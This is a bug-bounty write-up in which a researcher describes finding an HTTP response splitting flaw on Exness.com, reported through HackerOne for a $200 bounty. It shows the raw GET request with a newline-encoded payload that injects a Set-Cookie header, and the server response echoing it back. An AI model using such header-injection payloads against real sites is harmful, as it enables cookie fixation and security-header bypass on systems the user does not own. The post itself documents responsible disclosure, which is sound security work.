Revealing the Intriguing HTTP Response Splitting Vulnerability | Bounty $200
Hey there, I’m Umair Farooqui, and I’m thrilled to take you on a journey through a fascinating discovery I made in the ever-evolving realm of cybersecurity. Imagine stumbling upon a hidden chink in the armor of one of the renowned online platforms — Exness.com. That’s precisely what happened to me, and today, I’m excited to share my experience of uncovering an HTTP response splitting vulnerability on Exness. I reported this issue via HackerOne and was generously rewarded with a $200 bounty. In this detailed blog post, I’ll walk you through how I found this vulnerability, the step-by-step process to reproduce it, and the profound impact it could have on web security.
Discovery and Reporting:
On March 16, 2022, I embarked on a journey that would eventually lead me to a vulnerability on Exness.com. This vulnerability allowed attackers to sneakily inject malicious headers into the HTTP responses, a sinister tactic often referred to as HTTP response splitting. These manipulated response headers could open up a Pandora’s box of potential security risks.
Steps to Reproduce:
Let’s dive into the exciting journey of how I unveiled this vulnerability, complete with an interactive experience.
Send a GET Request: Our adventure begins with a simple GET request to the target URL, in this case, https://redicted.com. The crucial twist in the tale is the payload we attach to the request, cleverly designed to trigger the vulnerability.
GET /%0Aset-cookie:%20mufazmi=socialcodia;HTTP/2
Host: www.redicted.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Observe the Response: As we send this intriguing request, the response will include a new header that we’ve artfully inserted:
Set-Cookie: mufazmi=socialcodiaResponse Content: Our HTTP response indicates a redirection (HTTP 301 Moved Permanently). Here’s a peek at what it might look like:
HTTP/2 301 Moved Permanently
Date: Wed, 16 Mar 2022 22:15:24 GMT
Content-Type: text/html
Server: nginx/1.17.8
Location: /
Set-Cookie: mufazmi=socialcodia;
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>Impact:
Now, let’s unravel the significance of this discovery. The real power of this vulnerability lies in its ability to wreak havoc without requiring any user interaction. An attacker can exploit this by injecting malicious URLs or headers, as showcased earlier. This could have dire consequences, such as setting cookies for unsuspecting users on Exness.com or bypassing crucial security headers set by the server.
It’s worth noting that this vulnerability has its limitations, primarily because the request results in a redirect. This makes it challenging for attackers to execute other types of attacks like Cross-Site Scripting (XSS) or Cache Poisoning. Nevertheless, considering its potential for misuse without user interaction and the attacker’s ability to manipulate headers (including cookies), this vulnerability presents a considerable security risk.
Conclusion:
My journey of uncovering the HTTP response splitting vulnerability on Exness.com serves as a reminder of the ongoing importance of rigorous security testing and responsible disclosure. By identifying and reporting such vulnerabilities, we all contribute to a safer online environment.
I reported this vulnerability through HackerOne, and my efforts were duly recognized with a $200 bounty. This experience underscores the vital role that security researchers like myself play in the ongoing battle against cyber threats. As the digital landscape continues to evolve, it’s paramount for individuals and organizations alike to remain vigilant and proactive in addressing security vulnerabilities.
Stay curious, stay safe, and keep exploring the ever-changing world of cybersecurity! 🚀
